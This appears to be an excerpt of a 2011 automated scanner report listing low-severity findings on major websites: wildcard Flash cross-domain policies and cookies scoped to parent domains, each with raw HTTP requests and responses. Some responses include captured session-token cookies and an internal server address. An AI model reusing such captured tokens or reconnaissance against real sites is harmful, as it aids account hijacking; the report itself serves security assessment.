5.1. http://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.62.168.37
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

5.2. http://www.stumbleupon.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.stumbleupon.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 31 May 2011 21:14:02 GMT
Content-Type: application/xml
Content-Length: 460
Date: Wed, 06 Jul 2011 11:15:26 GMT
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="www.stumbleupon.com" />
   <allow-access-from domain="*.stumble.net" />
   <allow-access-from domain="stumble.net" />
   <allow-access-from domain="*.stumbleupon.com" />
   <allow-access-from domain="stumbleupon.com" />
   <allow-access-from domain="cdn.stumble-upon.com" />
...[SNIP]...

5.3. http://twitter.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:15:28 GMT
Server: Apache
Last-Modified: Tue, 05 Jul 2011 19:19:41 GMT
Accept-Ranges: bytes
Content-Length: 561
Cache-Control: max-age=1800
Expires: Wed, 06 Jul 2011 11:45:28 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<al
...[SNIP]...
<allow-access-from domain="api.twitter.com" />
   <allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

6. Cookie scoped to parent domain
There are 37 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-Cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


6.1. http://www.bebo.com/c/share

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bebo.com
Path:   /c/share

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c/share HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Location: http://www.bebo.com/PleaseSignIn.jsp?Page=c/share&popup=0
Content-Type: text/html; charset=UTF-8
Content-Length: 95
Date: Wed, 06 Jul 2011 11:21:00 GMT
Connection: close
Set-Cookie: bvid=bcfc7676-2f08-4e18-91ba-a0a7a2b05abd|1309951260831; domain=.bebo.com; path=/; expires=Tue, 04-Oct-2011 11:21:00 GMT
Set-Cookie: bdaysession=59cab38c07f11804620907511; domain=.bebo.com; path=/
Set-Cookie: sessioncreate=20110706112100; domain=.bebo.com; path=/

The URL has moved <a href="http://www.bebo.com/PleaseSignIn.jsp?Page=c/share&popup=0">here</a>

6.2. http://www.diigo.com/post

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.diigo.com
Path:   /post

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /post HTTP/1.1
Host: www.diigo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Wed, 06 Jul 2011 14:07:33 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Set-Cookie: CHKIO=; domain=.diigo.com; path=/; expires=Sat, 02 Jul 2011 10:07:33 GMT
Set-Cookie: diigoandlogincookie=; domain=.diigo.com; path=/; expires=Sat, 02 Jul 2011 10:07:33 GMT
Set-Cookie: _smasher_session=a9bd786efe2dc9056666343ce77be031; domain=diigo.com; path=/
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Location: https://secure.diigo.com/sign-in?referInfo=http%3A%2F%2Fwww.diigo.com%2Fpost
X-Runtime: 0.00062
Content-Length: 142
Cache-Control: no-cache

<html><body>You are being <a href="https://secure.diigo.com/sign-in?referInfo=http%3A%2F%2Fwww.diigo.com%2Fpost">redirected</a>.</body></html>

6.3. http://www.myspace.com/Modules/PostTo/Pages/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.myspace.com
Path:   /Modules/PostTo/Pages/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Modules/PostTo/Pages/ HTTP/1.1
Host: www.myspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fu%3dhttp%253a%252f%252fwww.myspace.com
Server: Microsoft-IIS/7.5
X-Server: b6a926eb7268a3c3750ad2730c953a9795441bd2feec1fa4
Set-Cookie: MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634455240459655487&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; domain=.myspace.com; expires=Wed, 13-Jul-2011 11:40:45 GMT; path=/
Set-Cookie: SessionDDF2=ErqkO3ydTaOccqIxl60+kHYCyG0t5ioyReAa6cduhLOm8nYvFSCSuhZtTbrUe7jHEB2KQMtn1NeMim1gRF15jw==; domain=.myspace.com; expires=Sun, 06-Jul-2031 11:40:45 GMT; path=/
X-AspNet-Version: 4.0.30319
X-PoweredBy: My Pet Hamster
Date: Wed, 06 Jul 2011 11:40:45 GMT
Content-Length: 249
X-Vertical: integrationframework

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fu%3dhttp%253a%252f%252f
...[SNIP]...

6.4. http://www.opensource.org/licenses/gpl-license.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/gpl-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:05:58 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.19 OpenSSL/0.9.8n DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=hgig1lfiopk95ql3u4pi3mr831; expires=Fri, 29-Jul-2011 17:39:18 GMT; path=/; domain=.opensource.org
Last-Modified: Wed, 06 Jul 2011 14:02:03 GMT
ETag: "1a6140a90b059f012afb34dbb1337aac"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 7275
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

6.5. http://www.opensource.org/licenses/mit-license.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:12 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.19 OpenSSL/0.9.8n DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=nckibgvdkif5pk4ruq9eiask34; expires=Fri, 29-Jul-2011 15:10:32 GMT; path=/; domain=.opensource.org
Last-Modified: Wed, 06 Jul 2011 11:32:17 GMT
ETag: "88cb710a049c0b384cfdb46952931378"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

6.6. http://segments.adap.tv/data/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segments.adap.tv
Path:   /data/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /data/?p=lotame&type=gif&audid=2723&add=true HTTP/1.1
Host: segments.adap.tv
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zNCZweGlkPTExNjgmcHhpZD01MzMmcHhpZD01NzY2JnB4aWQ9NTU2OCZweGlkPTYzOTMmcHhpZD01MyZweGlkPTI0NyZweGlkPTEyODYmcHhpZD01NzQ4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rtbData0="key=turn:value=4325897289836481830:expiresAt=Mon+Jul+04+18%3A51%3A56+PDT+2011:32-Compatible=true"; adaptv_unique_user_cookie="-5394452744830899625__TIME__2011-06-30+05%3A43%3A39"; audienceData="{\"v\":2,\"providers\":{\"31\":{\"f\":1311490800,\"e\":1311490800,\"s\":[1953,1952,1950,1966,1949,1960,1947,1962],\"a\":[]},\"9\":{\"f\":1312009200,\"e\":1312009200,\"s\":[1508,528,525],\"a\":[]},\"25\":{\"f\":1310886000,\"e\":1310886000,\"s\":[1996],\"a\":[]},\"8\":{\"f\":1311058800,\"e\":1311058800,\"s\":[1672],\"a\":[]},\"28\":{\"f\":1310886000,\"e\":1339830000,\"s\":[1802],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
p3p: CP="DEM"
Cache-Control: no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="-5394452744830899625__TIME__2011-07-06+04%3A21%3A53";Path=/;Domain=.adap.tv;Expires=Sat, 14-Mar-2043 13:08:33 GMT
Set-Cookie: audienceData="{\"v\":2,\"providers\":{\"7\":{\"f\":1312527600,\"e\":1312527600,\"s\":[1512],\"a\":[]},\"31\":{\"f\":1311490800,\"e\":1311490800,\"s\":[1953,1952,1950,1949,1966,1947,1960,1962],\"a\":[]},\"9\":{\"f\":1312009200,\"e\":1312009200,\"s\":[1508,528,525],\"a\":[]},\"25\":{\"f\":1310886000,\"e\":1310886000,\"s\":[1996],\"a\":[]},\"8\":{\"f\":1311058800,\"e\":1311058800,\"s\":[1672],\"a\":[]},\"28\":{\"f\":1310886000,\"e\":1339830000,\"s\":[1802],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Sat, 14-Mar-2043 13:08:33 GMT
Content-Type: image/gif
Server: Jetty(6.1.26)
Content-Length: 42

GIF89a.............!.......,...........D.;

6.7. https://signup.live.com/signup.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://signup.live.com
Path:   /signup.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signup.aspx HTTP/1.1
Host: signup.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&checkda=1&ct=1309951256&rver=6.1.6206.0&wp=MBI_SSL&wreply=https:%2F%2Fsignup.live.com%2Fsignup.aspx%3Flic%3D1&lc=1033&id=68692
Server: Microsoft-IIS/7.0
Set-Cookie: ipl=c=8SNt4URhbGxhc3xOb3J0aCBBbWVyaWNhfFVuaXRlZCBTdGF0ZXN8dXN8MzIuNzk5OTk5fC05Ni43ODcwMDJ8NzUyMDd8U291dGggQ2VudHJhbHxUZXhhcw&v=2; domain=.live.com; path=/; secure; HttpOnly
Set-Cookie: xidseq=2; domain=.live.com; path=/; secure
Set-Cookie: LD=; domain=.live.com; expires=Wed, 06-Jul-2011 09:40:56 GMT; path=/; secure
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Date: Wed, 06 Jul 2011 11:20:56 GMT
Connection: close
Content-Length: 331

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;checkda=1&amp;ct=1309951256&amp;rver=6.1.6206.0&amp;w
...[SNIP]...

6.8. http://social.zune.net/frag/MediaReviewBlock/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.zune.net
Path:   /frag/MediaReviewBlock/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /frag/MediaReviewBlock/ HTTP/1.1
Host: social.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
eid: 19ef6009-477e-4f49-b318-45f21f3e4179,857440
X-AspNet-Version: 2.0.50727
lx-svr: S803
X-Powered-By: ASP.NET
Expires: Wed, 06 Jul 2011 14:06:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 06 Jul 2011 14:06:46 GMT
Content-Length: 4716
Connection: close
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:36:46 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/

<h2 style=""></h2>
<div id="ajaxErr"></div>
<input type="hidden" id="_comments_hidDelete" /><div class="Pivot"> <a href="#" onclick="ajaxLoader('','&#47;frag&#47;MediaReviewBlock&#47;&#63;_saveRe
...[SNIP]...

6.9. http://social.zune.net/search.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.zune.net
Path:   /search.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search.aspx HTTP/1.1
Host: social.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
eid: 19ef6009-477e-4f49-b318-45f21f3e4179,857422
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
lx-svr: S803
X-Powered-By: ASP.NET
Expires: Wed, 06 Jul 2011 14:06:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 06 Jul 2011 14:06:38 GMT
Content-Length: 24089
Connection: close
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:36:36 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:38 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...

6.10. http://social.zune.net/zPage.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.zune.net
Path:   /zPage.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /zPage.aspx HTTP/1.1
Host: social.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
lx-svr: S805
X-Powered-By: ASP.NET
Content-Length: 13509
Expires: Wed, 06 Jul 2011 14:06:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 06 Jul 2011 14:06:50 GMT
Connection: close
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:06:49 GMT; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...

6.11. http://spaces.live.com/BlogIt.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://spaces.live.com
Path:   /BlogIt.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BlogIt.aspx HTTP/1.1
Host: spaces.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-Imf: ede387e6-6b9a-47e4-9826-4e6371654e4e
Set-Cookie: xidseq=2; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Wed, 06-Jul-2011 12:26:46 GMT; path=/
Set-Cookie: E=P:vQlOE/0Jzog=:M8dpwUFUPyf3AwZ60baR4PtyqHIUw3ChkgmFA7LS9ZU=:F; domain=.live.com; path=/
X-AspNet-Version: 4.0.30319
Set-Cookie: xidseq=2; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Wed, 06-Jul-2011 12:26:46 GMT; path=/
Set-Cookie: E=P:vQlOE/0Jzog=:M8dpwUFUPyf3AwZ60baR4PtyqHIUw3ChkgmFA7LS9ZU=:F; domain=.live.com; path=/
Set-Cookie: wla42=; domain=live.com; expires=Wed, 13-Jul-2011 14:06:46 GMT; path=/
Set-Cookie: sc_lpscache_142=; domain=spaces.live.com; path=/
Set-Cookie: sc_clustbl_142=08660009c693a889; domain=spaces.live.com; expires=Fri, 05-Aug-2011 14:06:46 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-MSNSERVER: H: SN2XXXXXC564 V: 1 D: 6/27/2011
Date: Wed, 06 Jul 2011 14:06:45 GMT
Connection: close
Content-Length: 2330


<html>
<head>
<noscript><meta http-equiv="refresh" content="2;url=https&#58;//login.live.com/login.srf&#63;wa&#61;wsignin1.0&#38;rpsnv&#61;11&#38;ct&#61;1309961206&#38;rver&#61;6.1.620
...[SNIP]...

6.12. http://va.px.invitemedia.com/goog_imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /goog_imp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /goog_imp?returnType=image&key=AdImp&cost=ThRFQQAEG8YK5TlPHdsIpCfKn676XEjdI1IuFw&creativeID=124070&message=eJyrVjI2VrJSMDI1NDHQUVAyNgJyzCwNzM1BPEMgRykkI8gtMNDR1d0i0ts0JCfAI6XYs8DR1lYJpBykwNzUyMAcxAPpNQHSpiAzDA0tgUwTIDOvNCcHyDQDiRobWBjXAgC0CRj.&managed=false HTTP/1.1
Host: va.px.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://pubads.g.doubleclick.net/gampad/ads?correlator=1309951294291&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_Home_300x250_ATFLeft&page_slots=Bebo_Home_300x250_ATFLeft&cust_params=Age%3D&cookie=ID%3D5d1731d2d654c623%3AT%3D1309951294%3AS%3DALNI_MYs8-PBIDTpzhXnmr-Aos6FdpkB-w&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2F&lmt=1309969296&dt=1309951296825&cc=65&biw=1057&bih=822&ifi=1&adk=491404383&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&flash=10.3.181&gads=v2&ga_vid=570193707.1309951297&ga_sid=1309951297&ga_hid=2099858697
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=09035c0c-59c0-487e-ac6a-85a606e2b1c1; exchange_uid=eyIyIjogWyIzNDIwNDE1MjQ1MjAwNjMzMDg1IiwgNzM0MzA4XSwgIjQiOiBbIkNBRVNFQkw2UWZGZE9aQkZ1d0t0cjRtWGN5YyIsIDczNDMwM119; dp_rec="{\"1\": 1308705141+ \"3\": 1308705126+ \"2\": 1308705121+ \"4\": 1305981633}"; subID="{}"; impressions="{\"652209\": [1307361360+ \"673736260435966816\"+ 29712+ 11561+ 12332]+ \"578963\": [1308705142+ \"5582cf52-010b-3f00-a0c2-ce399ddcd498\"+ 3241+ 40464+ 42]+ \"678220\": [1307963585+ \"96c74834-d3fd-3b96-9551-b00ee21c6eae\"+ 7025+ 59171+ 7407]+ \"702131\": [1309234818+ \"6711271471285110655\"+ 160677+ 103577+ 2]+ \"678238\": [1307361357+ \"4303623916581927836\"+ 4478+ 2534+ 12332]+ \"578969\": [1306540018+ \"6628743465197727397\"+ 186+ 789+ 1950]+ \"536719\": [1306540056+ \"4971361720444723341\"+ 29712+ 11561+ 1950]+ \"646575\": [1306535330+ \"2511253520107290994\"+ 174+ 657+ 1950]+ \"691082\": [1308190340+ \"7771034340879608580\"+ 169+ 657+ 2]+ \"648697\": [1305981627+ \"TdeyuAAD1QgK5YAmcxVKhQ==\"+ 115193+ 62482+ 3931]+ \"648698\": [1305981630+ \"TdeyvAAIEhEK5YMHYIpYlA==\"+ 115188+ 62482+ 3931]+ \"678237\": [1309235299+ \"6199351355498244314\"+ 4483+ 2534+ 2]+ \"546680\": [1306514382+ \"8130604638783651597\"+ 174+ 657+ 1950]+ \"578938\": [1306506452+ \"895314541263651941\"+ 186+ 789+ 1950]+ \"690770\": [1308836704+ \"TgNDVQABeU4K7F4GcysJsg==\"+ 63083+ 25140+ 4515]+ \"650395\": [1305746717+ \"aff8f785-6bd0-31ca-97a4-49cafd80eda3\"+ 79272+ 59150+ 7406]+ \"584205\": [1309235459+ \"4153838206207653460\"+ 160819+ 103586+ 2]+ \"642979\": [1309224535+ \"2550584914158478617\"+ 162013+ 105345+ 2]+ \"609770\": [1308705126+ \"4234390b-dad8-3097-8291-83ad77634b5c\"+ 135488+ 76161+ 55]+ \"580191\": [1307361309+ \"6341833618359868224\"+ 29707+ 11561+ 12332]}"; 
